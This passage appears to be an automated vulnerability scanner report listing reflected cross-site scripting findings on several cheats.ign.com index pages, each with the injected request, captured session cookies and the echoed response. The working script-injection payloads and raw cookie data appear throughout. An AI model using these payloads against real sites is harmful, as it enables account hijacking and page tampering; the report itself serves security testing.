The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6b1c2"><script>alert(1)</script>acb3df6b5fc was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /index/pc-cheats/index.html?6b1c2"><script>alert(1)</script>acb3df6b5fc=1 HTTP/1.1
Host: cheats.ign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _br_uid_1=uid%3D6931773698889%3A; s_sess=%20s_cc%3Dtrue%3B%20s_v13%3Dwww.ign.com%253Acheats.ign.com%3B%20s_c13%3Dwww.ign.com%253Acheats.ign.com%3B%20s_sq%3Dignignus%253D%252526pid%25253Dign%2525253Aign%2525253Ahub%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//my.ign.com/register%2525253Fr%2525253Dhttp%2525253A//www.ign.com/%252526ot%25253DA%3B; __utmz=173446715.1297040497.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/2|utmcmd=referral; freq=c-1297040326761v-1n-12mc+1297040326761mv+1mn+12wwe~0; i18n-cc=US; optimizelyEndUserId=oeu1297040486304r0.669825860997662; optimizelyBuckets=%7B%224875108%22%3A4948008%7D; rsi_segs=; s_pers=%20s_nr%3D1297040542541%7C1299632542541%3B%20s_lv%3D1297040542542%7C1391648542542%3B%20s_lv_s%3DFirst%2520Visit%7C1297042342542%3B; decc=US; NGUserID=a016c09-18740-885768600-2; MSCulture=IP=173.193.214.243&IPCulture=en-US&PreferredCulture=en-US&PreferredCulturePending=&Country=VVM=&ForcedExpiration=0&timeZone=0&myStuffDma=&myStuffMarket=&USRLOC=QXJlYUNvZGU9MjE0JkNpdHk9RGFsbGFzJkNvdW50cnlDb2RlPVVTJkNvdW50cnlOYW1lPVVuaXRlZCBTdGF0ZXMmRG1hQ29kZT02MjMmTGF0aXR1ZGU9MzIuNzgyNSZMb25naXR1ZGU9LTk2LjgyMDcmUG9zdGFsQ29kZT03NTIwNyZSZWdpb25OYW1lPVRYJkxvY2F0aW9uSWQ9MA==; s_vi=[CS]v1|26A7A237050791B4-40000100A0002F6F[CE]; __utma=173446715.1624600188.1297040497.1297040497.1297040497.1; ATA=ign.129704044868759.173.193.214.243; __utmc=173446715; __utmb=173446715.1.10.1297040497;

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 01:12:58 GMT
Server: Jetty/5.1.10 (Linux/2.6.18-164.6.1.el5 amd64 java/1.6.0_13
Pragma: no-cache
Cache-Control: must-revalidate,no-cache,no-store
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/html;charset=UTF-8
Set-Cookie: freq=c-1297040326761v-2n-12mc+1297040326761mv+2mn+12wwe~0;Path=/;Domain=.ign.com
Content-Length: 140604

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><!-- /* AD from: http://ssa.ign.co
...[SNIP]...
<img src="http://b.scorecardresearch.com/b?c1=2&c2=3000068&c3=&c4=http://cheats.ign.com/index/pc-cheats/index.html?6b1c2"><script>alert(1)</script>acb3df6b5fc=1&c5=&c6=&c15=C67BD3C1&cv=1.3&cj=1" style="display:none" width="0" height="0" alt="" />
...[SNIP]...

1.86. http://cheats.ign.com/index/playstation-3-cheats/index.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cheats.ign.com
Path:   /index/playstation-3-cheats/index.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9c6ff"><script>alert(1)</script>9b70942b9ae was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /index/playstation-3-cheats/index.html?9c6ff"><script>alert(1)</script>9b70942b9ae=1 HTTP/1.1
Host: cheats.ign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _br_uid_1=uid%3D6931773698889%3A; s_sess=%20s_cc%3Dtrue%3B%20s_v13%3Dwww.ign.com%253Acheats.ign.com%3B%20s_c13%3Dwww.ign.com%253Acheats.ign.com%3B%20s_sq%3Dignignus%253D%252526pid%25253Dign%2525253Aign%2525253Ahub%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//my.ign.com/register%2525253Fr%2525253Dhttp%2525253A//www.ign.com/%252526ot%25253DA%3B; __utmz=173446715.1297040497.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/2|utmcmd=referral; freq=c-1297040326761v-1n-12mc+1297040326761mv+1mn+12wwe~0; i18n-cc=US; optimizelyEndUserId=oeu1297040486304r0.669825860997662; optimizelyBuckets=%7B%224875108%22%3A4948008%7D; rsi_segs=; s_pers=%20s_nr%3D1297040542541%7C1299632542541%3B%20s_lv%3D1297040542542%7C1391648542542%3B%20s_lv_s%3DFirst%2520Visit%7C1297042342542%3B; decc=US; NGUserID=a016c09-18740-885768600-2; MSCulture=IP=173.193.214.243&IPCulture=en-US&PreferredCulture=en-US&PreferredCulturePending=&Country=VVM=&ForcedExpiration=0&timeZone=0&myStuffDma=&myStuffMarket=&USRLOC=QXJlYUNvZGU9MjE0JkNpdHk9RGFsbGFzJkNvdW50cnlDb2RlPVVTJkNvdW50cnlOYW1lPVVuaXRlZCBTdGF0ZXMmRG1hQ29kZT02MjMmTGF0aXR1ZGU9MzIuNzgyNSZMb25naXR1ZGU9LTk2LjgyMDcmUG9zdGFsQ29kZT03NTIwNyZSZWdpb25OYW1lPVRYJkxvY2F0aW9uSWQ9MA==; s_vi=[CS]v1|26A7A237050791B4-40000100A0002F6F[CE]; __utma=173446715.1624600188.1297040497.1297040497.1297040497.1; ATA=ign.129704044868759.173.193.214.243; __utmc=173446715; __utmb=173446715.1.10.1297040497;

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 01:13:01 GMT
Server: Jetty/5.1.10 (Linux/2.6.18-164.6.1.el5 amd64 java/1.6.0_13
Pragma: no-cache
Cache-Control: must-revalidate,no-cache,no-store
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/html;charset=UTF-8
Set-Cookie: freq=c-1297040326761v-2n-12mc+1297040326761mv+2mn+12wwe~0;Path=/;Domain=.ign.com
Content-Length: 145661

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><!-- /* AD from: http://ssa.ign.co
...[SNIP]...
<img src="http://b.scorecardresearch.com/b?c1=2&c2=3000068&c3=&c4=http://cheats.ign.com/index/playstation-3-cheats/index.html?9c6ff"><script>alert(1)</script>9b70942b9ae=1&c5=&c6=&c15=C67BD3C1&cv=1.3&cj=1" style="display:none" width="0" height="0" alt="" />
...[SNIP]...

1.87. http://cheats.ign.com/index/playstation-3-cheats/index.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cheats.ign.com
Path:   /index/playstation-3-cheats/index.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5fc63"-alert(1)-"d1160877f7c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /index/playstation-3-cheats/index.html?5fc63"-alert(1)-"d1160877f7c=1 HTTP/1.1
Host: cheats.ign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _br_uid_1=uid%3D6931773698889%3A; s_sess=%20s_cc%3Dtrue%3B%20s_v13%3Dwww.ign.com%253Acheats.ign.com%3B%20s_c13%3Dwww.ign.com%253Acheats.ign.com%3B%20s_sq%3Dignignus%253D%252526pid%25253Dign%2525253Aign%2525253Ahub%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//my.ign.com/register%2525253Fr%2525253Dhttp%2525253A//www.ign.com/%252526ot%25253DA%3B; __utmz=173446715.1297040497.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/2|utmcmd=referral; freq=c-1297040326761v-1n-12mc+1297040326761mv+1mn+12wwe~0; i18n-cc=US; optimizelyEndUserId=oeu1297040486304r0.669825860997662; optimizelyBuckets=%7B%224875108%22%3A4948008%7D; rsi_segs=; s_pers=%20s_nr%3D1297040542541%7C1299632542541%3B%20s_lv%3D1297040542542%7C1391648542542%3B%20s_lv_s%3DFirst%2520Visit%7C1297042342542%3B; decc=US; NGUserID=a016c09-18740-885768600-2; MSCulture=IP=173.193.214.243&IPCulture=en-US&PreferredCulture=en-US&PreferredCulturePending=&Country=VVM=&ForcedExpiration=0&timeZone=0&myStuffDma=&myStuffMarket=&USRLOC=QXJlYUNvZGU9MjE0JkNpdHk9RGFsbGFzJkNvdW50cnlDb2RlPVVTJkNvdW50cnlOYW1lPVVuaXRlZCBTdGF0ZXMmRG1hQ29kZT02MjMmTGF0aXR1ZGU9MzIuNzgyNSZMb25naXR1ZGU9LTk2LjgyMDcmUG9zdGFsQ29kZT03NTIwNyZSZWdpb25OYW1lPVRYJkxvY2F0aW9uSWQ9MA==; s_vi=[CS]v1|26A7A237050791B4-40000100A0002F6F[CE]; __utma=173446715.1624600188.1297040497.1297040497.1297040497.1; ATA=ign.129704044868759.173.193.214.243; __utmc=173446715; __utmb=173446715.1.10.1297040497;

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 01:13:04 GMT
Server: Jetty/5.1.10 (Linux/2.6.18-164.6.1.el5 amd64 java/1.6.0_13
Pragma: no-cache
Cache-Control: must-revalidate,no-cache,no-store
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/html;charset=UTF-8
Set-Cookie: freq=c-1297040326761v-2n-12mc+1297040326761mv+2mn+12wwe~0;Path=/;Domain=.ign.com
Content-Length: 145534

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><!-- /* AD from: http://ssa.ign.co
...[SNIP]...
= 'undefined') {
       COMSCORE.beacon({
        c1:2,
        c2:"3000068",
        c3:"",
        c4:"http://cheats.ign.com/index/playstation-3-cheats/index.html?5fc63"-alert(1)-"d1160877f7c=1",
        c5:"",
        c6:"",
        c15:"" });
       var _comscoreGuard = new Object();
   }
</script>
...[SNIP]...

1.88. http://cheats.ign.com/index/playstation-portable-cheats/index.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cheats.ign.com
Path:   /index/playstation-portable-cheats/index.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7b2f8"><script>alert(1)</script>a0f6b4d3eae was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /index/playstation-portable-cheats/index.html?7b2f8"><script>alert(1)</script>a0f6b4d3eae=1 HTTP/1.1
Host: cheats.ign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _br_uid_1=uid%3D6931773698889%3A; s_sess=%20s_cc%3Dtrue%3B%20s_v13%3Dwww.ign.com%253Acheats.ign.com%3B%20s_c13%3Dwww.ign.com%253Acheats.ign.com%3B%20s_sq%3Dignignus%253D%252526pid%25253Dign%2525253Aign%2525253Ahub%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//my.ign.com/register%2525253Fr%2525253Dhttp%2525253A//www.ign.com/%252526ot%25253DA%3B; __utmz=173446715.1297040497.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/2|utmcmd=referral; freq=c-1297040326761v-1n-12mc+1297040326761mv+1mn+12wwe~0; i18n-cc=US; optimizelyEndUserId=oeu1297040486304r0.669825860997662; optimizelyBuckets=%7B%224875108%22%3A4948008%7D; rsi_segs=; s_pers=%20s_nr%3D1297040542541%7C1299632542541%3B%20s_lv%3D1297040542542%7C1391648542542%3B%20s_lv_s%3DFirst%2520Visit%7C1297042342542%3B; decc=US; NGUserID=a016c09-18740-885768600-2; MSCulture=IP=173.193.214.243&IPCulture=en-US&PreferredCulture=en-US&PreferredCulturePending=&Country=VVM=&ForcedExpiration=0&timeZone=0&myStuffDma=&myStuffMarket=&USRLOC=QXJlYUNvZGU9MjE0JkNpdHk9RGFsbGFzJkNvdW50cnlDb2RlPVVTJkNvdW50cnlOYW1lPVVuaXRlZCBTdGF0ZXMmRG1hQ29kZT02MjMmTGF0aXR1ZGU9MzIuNzgyNSZMb25naXR1ZGU9LTk2LjgyMDcmUG9zdGFsQ29kZT03NTIwNyZSZWdpb25OYW1lPVRYJkxvY2F0aW9uSWQ9MA==; s_vi=[CS]v1|26A7A237050791B4-40000100A0002F6F[CE]; __utma=173446715.1624600188.1297040497.1297040497.1297040497.1; ATA=ign.129704044868759.173.193.214.243; __utmc=173446715; __utmb=173446715.1.10.1297040497;

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 01:13:05 GMT
Server: Jetty/5.1.10 (Linux/2.6.18-164.6.1.el5 amd64 java/1.6.0_13
Pragma: no-cache
Cache-Control: must-revalidate,no-cache,no-store
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/html;charset=UTF-8
Set-Cookie: freq=c-1297040326761v-2n-12mc+1297040326761mv+2mn+12wwe~0;Path=/;Domain=.ign.com
Content-Length: 133883

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><!-- /* AD from: http://ssa.ign.co
...[SNIP]...
<img src="http://b.scorecardresearch.com/b?c1=2&c2=3000068&c3=&c4=http://cheats.ign.com/index/playstation-portable-cheats/index.html?7b2f8"><script>alert(1)</script>a0f6b4d3eae=1&c5=&c6=&c15=C67BD3C1&cv=1.3&cj=1" style="display:none" width="0" height="0" alt="" />
...[SNIP]...

1.89. http://cheats.ign.com/index/playstation-portable-cheats/index.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cheats.ign.com
Path:   /index/playstation-portable-cheats/index.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7eda0"-alert(1)-"f4bf6d7729 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /index/playstation-portable-cheats/index.html?7eda0"-alert(1)-"f4bf6d7729=1 HTTP/1.1
Host: cheats.ign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _br_uid_1=uid%3D6931773698889%3A; s_sess=%20s_cc%3Dtrue%3B%20s_v13%3Dwww.ign.com%253Acheats.ign.com%3B%20s_c13%3Dwww.ign.com%253Acheats.ign.com%3B%20s_sq%3Dignignus%253D%252526pid%25253Dign%2525253Aign%2525253Ahub%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//my.ign.com/register%2525253Fr%2525253Dhttp%2525253A//www.ign.com/%252526ot%25253DA%3B; __utmz=173446715.1297040497.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/2|utmcmd=referral; freq=c-1297040326761v-1n-12mc+1297040326761mv+1mn+12wwe~0; i18n-cc=US; optimizelyEndUserId=oeu1297040486304r0.669825860997662; optimizelyBuckets=%7B%224875108%22%3A4948008%7D; rsi_segs=; s_pers=%20s_nr%3D1297040542541%7C1299632542541%3B%20s_lv%3D1297040542542%7C1391648542542%3B%20s_lv_s%3DFirst%2520Visit%7C1297042342542%3B; decc=US; NGUserID=a016c09-18740-885768600-2; MSCulture=IP=173.193.214.243&IPCulture=en-US&PreferredCulture=en-US&PreferredCulturePending=&Country=VVM=&ForcedExpiration=0&timeZone=0&myStuffDma=&myStuffMarket=&USRLOC=QXJlYUNvZGU9MjE0JkNpdHk9RGFsbGFzJkNvdW50cnlDb2RlPVVTJkNvdW50cnlOYW1lPVVuaXRlZCBTdGF0ZXMmRG1hQ29kZT02MjMmTGF0aXR1ZGU9MzIuNzgyNSZMb25naXR1ZGU9LTk2LjgyMDcmUG9zdGFsQ29kZT03NTIwNyZSZWdpb25OYW1lPVRYJkxvY2F0aW9uSWQ9MA==; s_vi=[CS]v1|26A7A237050791B4-40000100A0002F6F[CE]; __utma=173446715.1624600188.1297040497.1297040497.1297040497.1; ATA=ign.129704044868759.173.193.214.243; __utmc=173446715; __utmb=173446715.1.10.1297040497;

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 01:13:08 GMT
Server: Jetty/5.1.10 (Linux/2.6.18-164.6.1.el5 amd64 java/1.6.0_13
Pragma: no-cache
Cache-Control: must-revalidate,no-cache,no-store
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/html;charset=UTF-8
Set-Cookie: freq=c-1297040326761v-2n-12mc+1297040326761mv+2mn+12wwe~0;Path=/;Domain=.ign.com
Content-Length: 133819

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><!-- /* AD from: http://ssa.ign.co
...[SNIP]...
fined') {
       COMSCORE.beacon({
        c1:2,
        c2:"3000068",
        c3:"",
        c4:"http://cheats.ign.com/index/playstation-portable-cheats/index.html?7eda0"-alert(1)-"f4bf6d7729=1",
        c5:"",
        c6:"",
        c15:"" });
       var _comscoreGuard = new Object();
   }
</script>
...[SNIP]...

1.90. http://cheats.ign.com/index/wii-cheats/index.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cheats.ign.com
Path:   /index/wii-cheats/index.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 57ac0"-alert(1)-"3c9c5074ccb was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /index/wii-cheats/index.html?57ac0"-alert(1)-"3c9c5074ccb=1 HTTP/1.1
Host: cheats.ign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _br_uid_1=uid%3D6931773698889%3A; s_sess=%20s_cc%3Dtrue%3B%20s_v13%3Dwww.ign.com%253Acheats.ign.com%3B%20s_c13%3Dwww.ign.com%253Acheats.ign.com%3B%20s_sq%3Dignignus%253D%252526pid%25253Dign%2525253Aign%2525253Ahub%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//my.ign.com/register%2525253Fr%2525253Dhttp%2525253A//www.ign.com/%252526ot%25253DA%3B; __utmz=173446715.1297040497.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/2|utmcmd=referral; freq=c-1297040326761v-1n-12mc+1297040326761mv+1mn+12wwe~0; i18n-cc=US; optimizelyEndUserId=oeu1297040486304r0.669825860997662; optimizelyBuckets=%7B%224875108%22%3A4948008%7D; rsi_segs=; s_pers=%20s_nr%3D1297040542541%7C1299632542541%3B%20s_lv%3D1297040542542%7C1391648542542%3B%20s_lv_s%3DFirst%2520Visit%7C1297042342542%3B; decc=US; NGUserID=a016c09-18740-885768600-2; MSCulture=IP=173.193.214.243&IPCulture=en-US&PreferredCulture=en-US&PreferredCulturePending=&Country=VVM=&ForcedExpiration=0&timeZone=0&myStuffDma=&myStuffMarket=&USRLOC=QXJlYUNvZGU9MjE0JkNpdHk9RGFsbGFzJkNvdW50cnlDb2RlPVVTJkNvdW50cnlOYW1lPVVuaXRlZCBTdGF0ZXMmRG1hQ29kZT02MjMmTGF0aXR1ZGU9MzIuNzgyNSZMb25naXR1ZGU9LTk2LjgyMDcmUG9zdGFsQ29kZT03NTIwNyZSZWdpb25OYW1lPVRYJkxvY2F0aW9uSWQ9MA==; s_vi=[CS]v1|26A7A237050791B4-40000100A0002F6F[CE]; __utma=173446715.1624600188.1297040497.1297040497.1297040497.1; ATA=ign.129704044868759.173.193.214.243; __utmc=173446715; __utmb=173446715.1.10.1297040497;

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 01:12:58 GMT
Server: Jetty/5.1.10 (Linux/2.6.18-164.6.1.el5 amd64 java/1.6.0_13
Pragma: no-cache
Cache-Control: must-revalidate,no-cache,no-store
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/html;charset=UTF-8
Set-Cookie: freq=c-1297040326761v-2n-12mc+1297040326761mv+2mn+12wwe~0;Path=/;Domain=.ign.com
Content-Length: 143107

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><!-- /* AD from: http://ssa.ign.co
...[SNIP]...
oreGuard == 'undefined') {
       COMSCORE.beacon({
        c1:2,
        c2:"3000068",
        c3:"",
        c4:"http://cheats.ign.com/index/wii-cheats/index.html?57ac0"-alert(1)-"3c9c5074ccb=1",
        c5:"",
        c6:"",
        c15:"" });
       var _comscoreGuard = new Object();
   }
</script>
...[SNIP]...

1.91. http://cheats.ign.com/index/wii-cheats/index.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cheats.ign.com
Path:   /index/wii-cheats/index.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a851c"><script>alert(1)</script>1a568c9cf90 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /index/wii-cheats/index.html?a851c"><script>alert(1)</script>1a568c9cf90=1 HTTP/1.1
Host: cheats.ign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _br_uid_1=uid%3D6931773698889%3A; s_sess=%20s_cc%3Dtrue%3B%20s_v13%3Dwww.ign.com%253Acheats.ign.com%3B%20s_c13%3Dwww.ign.com%253Acheats.ign.com%3B%20s_sq%3Dignignus%253D%252526pid%25253Dign%2525253Aign%2525253Ahub%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//my.ign.com/register%2525253Fr%2525253Dhttp%2525253A//www.ign.com/%252526ot%25253DA%3B; __utmz=173446715.1297040497.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/2|utmcmd=referral; freq=c-1297040326761v-1n-12mc+1297040326761mv+1mn+12wwe~0; i18n-cc=US; optimizelyEndUserId=oeu1297040486304r0.669825860997662; optimizelyBuckets=%7B%224875108%22%3A4948008%7D; rsi_segs=; s_pers=%20s_nr%3D1297040542541%7C1299632542541%3B%20s_lv%3D1297040542542%7C1391648542542%3B%20s_lv_s%3DFirst%2520Visit%7C1297042342542%3B; decc=US; NGUserID=a016c09-18740-885768600-2; MSCulture=IP=173.193.214.243&IPCulture=en-US&PreferredCulture=en-US&PreferredCulturePending=&Country=VVM=&ForcedExpiration=0&timeZone=0&myStuffDma=&myStuffMarket=&USRLOC=QXJlYUNvZGU9MjE0JkNpdHk9RGFsbGFzJkNvdW50cnlDb2RlPVVTJkNvdW50cnlOYW1lPVVuaXRlZCBTdGF0ZXMmRG1hQ29kZT02MjMmTGF0aXR1ZGU9MzIuNzgyNSZMb25naXR1ZGU9LTk2LjgyMDcmUG9zdGFsQ29kZT03NTIwNyZSZWdpb25OYW1lPVRYJkxvY2F0aW9uSWQ9MA==; s_vi=[CS]v1|26A7A237050791B4-40000100A0002F6F[CE]; __utma=173446715.1624600188.1297040497.1297040497.1297040497.1; ATA=ign.129704044868759.173.193.214.243; __utmc=173446715; __utmb=173446715.1.10.1297040497;

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 01:12:55 GMT
Server: Jetty/5.1.10 (Linux/2.6.18-164.6.1.el5 amd64 java/1.6.0_13
Pragma: no-cache
Cache-Control: must-revalidate,no-cache,no-store
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/html;charset=UTF-8
Set-Cookie: freq=c-1297040326761v-2n-12mc+1297040326761mv+2mn+12wwe~0;Path=/;Domain=.ign.com
Content-Length: 143168

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><!-- /* AD from: http://ssa.ign.co
...[SNIP]...
<img src="http://b.scorecardresearch.com/b?c1=2&c2=3000068&c3=&c4=http://cheats.ign.com/index/wii-cheats/index.html?a851c"><script>alert(1)</script>1a568c9cf90=1&c5=&c6=&c15=C67BD3C1&cv=1.3&cj=1" style="display:none" width="0" height="0" alt="" />
...[SNIP]...

1.92. http://cheats.ign.com/index/xbox-360-cheats/index.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cheats.ign.com
Path:   /index/xbox-360-cheats/index.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 342f5"><script>alert(1)</script>f6da6f90a8e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /index/xbox-360-cheats/index.html?342f5"><script>alert(1)</script>f6da6f90a8e=1 HTTP/1.1
Host: cheats.ign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _br_uid_1=uid%3D6931773698889%3A; s_sess=%20s_cc%3Dtrue%3B%20s_v13%3Dwww.ign.com%253Acheats.ign.com%3B%20s_c13%3Dwww.ign.com%253Acheats.ign.com%3B%20s_sq%3Dignignus%253D%252526pid%25253Dign%2525253Aign%2525253Ahub%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//my.ign.com/register%2525253Fr%2525253Dhttp%2525253A//www.ign.com/%252526ot%25253DA%3B; __utmz=173446715.1297040497.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/2|utmcmd=referral; freq=c-1297040326761v-1n-12mc+1297040326761mv+1mn+12wwe~0; i18n-cc=US; optimizelyEndUserId=oeu1297040486304r0.669825860997662; optimizelyBuckets=%7B%224875108%22%3A4948008%7D; rsi_segs=; s_pers=%20s_nr%3D1297040542541%7C1299632542541%3B%20s_lv%3D1297040542542%7C1391648542542%3B%20s_lv_s%3DFirst%2520Visit%7C1297042342542%3B; decc=US; NGUserID=a016c09-18740-885768600-2; MSCulture=IP=173.193.214.243&IPCulture=en-US&PreferredCulture=en-US&PreferredCulturePending=&Country=VVM=&ForcedExpiration=0&timeZone=0&myStuffDma=&myStuffMarket=&USRLOC=QXJlYUNvZGU9MjE0JkNpdHk9RGFsbGFzJkNvdW50cnlDb2RlPVVTJkNvdW50cnlOYW1lPVVuaXRlZCBTdGF0ZXMmRG1hQ29kZT02MjMmTGF0aXR1ZGU9MzIuNzgyNSZMb25naXR1ZGU9LTk2LjgyMDcmUG9zdGFsQ29kZT03NTIwNyZSZWdpb25OYW1lPVRYJkxvY2F0aW9uSWQ9MA==; s_vi=[CS]v1|26A7A237050791B4-40000100A0002F6F[CE]; __utma=173446715.1624600188.1297040497.1297040497.1297040497.1; ATA=ign.129704044868759.173.193.214.243; __utmc=173446715; __utmb=173446715.1.10.1297040497;

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 01:12:56 GMT
Server: Jetty/5.1.10 (Linux/2.6.18-164.6.1.el5 amd64 java/1.6.0_13
Pragma: no-cache
Cache-Control: must-revalidate,no-cache,no-store
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/html;charset=UTF-8
Set-Cookie: freq=c-1297040326761v-2n-12mc+1297040326761mv+2mn+12wwe~0;Path=/;Domain=.ign.com
Content-Length: 151239

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><!-- /* AD from: http://ssa.ign.co
...[SNIP]...
